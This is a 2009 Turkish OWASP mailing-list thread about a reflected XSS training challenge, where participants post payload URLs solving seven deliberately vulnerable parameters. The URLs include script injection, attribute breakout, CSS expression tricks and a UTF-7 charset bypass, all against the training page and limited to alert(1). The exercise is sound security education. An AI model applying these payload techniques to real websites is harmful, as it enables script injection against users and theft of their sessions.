[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

Çağdaş EMEK keramet at gmail.com
Thu Jun 18 05:11:33 EDT 2009


Merhabalar,

DVD elime ulaşt , dvd'nin içeriği çok güzel. Benim için güzel bir kaynak
oldu.
Çok teşekkür ederim.

Sevgiler saygılar,

2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>

> Uygulamayi ipuclarini da icerecek sekilde update ettim.
>
> http://www.webguvenligi.org/xsstb/reflected.php
>
>
>
> 16 Haziran 2009 Salı 09:30 tarihinde Huzeyfe ONAL <huzeyfe at lifeoverip.net>yazdı:
>
> Selamlar,
>>
>>
>> benim default ayarlarla denedigim birkac arac da bazilarini bulamadi. Bu
>> aslinda otomatize araclarin/yontemlerin ne kadar efektif olabilecegini
>> gostermesi acisindan onemli bir calisma.
>>
>> Ama buradaki xss'lerin gunumuz uygulamalarinda bulunma orani da cok
>> onemli. Yani %1 bulunacak bir ihtimal icin bir dunya ek calisma yapmak
>> istemiyordur arac yazarlari.
>>
>>
>>
>> ---
>> Huzeyfe ONAL
>> Ag Guvenligi Listesine uye oldunuz mu?
>> http://blog.lifeoverip.net/netsec-listesi/
>>
>> ---
>>
>>
>> 2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>
>>
>>>   tesekkurler Sertan. Tebrik ederim, referansli aciklamalarin ozellikle
>>> cok faydali. Cagdas ile adreslerinizi bana ozel gonderebilirseniz hediyeleri
>>> gonderecegim.
>>>
>>> Bu arada hepsini bulan (false-positive olmayacak sekilde)
>>> otomatik uygulama varsa bildiginiz merak ediyorum. Benim denediklerim de
>>> mutlaka 1-2 (hatta bazen 3) eksik cikiyor.
>>>
>>> 16 Haziran 2009 Salı 00:23 tarihinde Sertan Kolat <
>>> sertan at mlists.olympos.org> yazdı:
>>>
>>>  Merhaba,
>>>>
>>>>
>>>> Cok guzel uygulama, elinize saglik.
>>>>
>>>>
>>>> 1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=
>>>> <script>alert(1)</script>a
>>>>
>>>> 2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2=
>>>> "><script>alert(1)</script>a
>>>>
>>>> 3) (IE6)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url%28javascript:alert%281%29%29>
>>>>
>>>> veya (IE8)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression%28alert%281%29%29>
>>>> ;
>>>>
>>>> 4) (FF3)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert%281%29;%3C/script%3E>
>>>>
>>>> 5) (FF3)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert%281%29%3E>
>>>>
>>>> 6) (IE7, encoding auto-select[1])
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-<http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert%281%29%2bADw-%2fscript%2bAD4->
>>>>
>>>> 7) (IE6)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url%28javascript:alert%281%29%29>
>>>>
>>>>
>>>>
>>>> [1] IE charset encoding Auto-Selection:
>>>>
>>>> If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a
>>>> UTF-7 string in the first 4096 characters of the response's body, it will
>>>> set the charset encoding to UTF-7 automatically, unless a certain charset
>>>> encoding is already enforced.
>>>>
>>>>
>>>>
>>>> Sertan Kolat
>>>>
>>>>
>>>> On Monday, June 15, 2009, 1:06:17 PM, you wrote:
>>>>
>>>>  Merhaba,
>>>>
>>>> Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir "oyun
>>>> grubu" uygulamasına http://www.webguvenligi.org/xsstb/reflected.php
>>>>  erişebilirsiniz.
>>>>
>>>> Uygulamada 7 parametreye (vector1, vector2, ..., vector7)
>>>> uygulanabilecek xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu
>>>> maile reply-all olarak asagida verdigim link gibi gonderen ilk iki kisye;
>>>>
>>>>
>>>>
>>>> 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
>>>>
>>>> 2inciye Son model araba
>>>>
>>>>
>>>>
>>>> Yok daha neler!...
>>>>
>>>>
>>>>
>>>> 1inciye OWASP Membership T-Shirt'u (L)
>>>>
>>>> 2inciye OWASP Membership DVD'si
>>>>
>>>>
>>>>
>>>> gonderecegim.
>>>>
>>>>
>>>>
>>>> Ornek; (birinci tuyo benden)
>>>>
>>>>
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert%281%29%3C/script%3E>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
>>>>
>>>> Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
>>>>
>>>> Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim"
>>>> olmasin
>>>>
>>>>
>>>>
>>>> Proje Post'u:
>>>> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
>>>>
>>>> --
>>>>
>>>> Bedirhan Urgun
>>>>
>>>> http://www.webguvenligi.org
>>>>
>>>> http://www.owasp.org/index.php/Turkey
>>>>
>>>>
>>>> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
>>>>
>>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>>
>>>
>>>
>>>
>>> --
>>>  Bedirhan Urgun
>>> http://www.webguvenligi.org
>>> http://www.owasp.org/index.php/Turkey
>>>
>>> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>
>>> _______________________________________________
>>> Owasp-turkey mailing list
>>> Owasp-turkey at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>
>>>
>>
>> _______________________________________________
>> Owasp-turkey mailing list
>> Owasp-turkey at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>
>>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>


-- 
Çağdaş Emek
Software Engineer
http://www.linkedin.com/in/keramet
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20090618/3a45363f/attachment.html 


More information about the Owasp-turkey mailing list